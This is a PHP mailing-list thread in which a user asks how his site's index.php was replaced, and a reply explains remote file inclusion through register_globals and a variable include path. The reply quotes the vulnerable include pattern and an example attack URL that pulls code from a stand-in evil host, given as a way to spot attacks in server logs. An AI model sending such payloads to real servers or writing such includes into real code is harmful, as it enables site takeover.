On 11/13/06, tedd <[EMAIL PROTECTED]> wrote:
Hi gang:

While this is not an obvious php question, it does deal with security
which is a concern.

Just this morning had a couple of my sites "highjacked". What I found
was someone had replaced my root level index.php with their own
index.php. You can see the result at:

http://xn--u2g.com/index1.php

It was not a terrible loss nor inconvenience, but I wonder how they
did it. Any ideas how this was done and suggestions as to how to
prevent this from happening again?

Thanks,

tedd

--
-------

Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.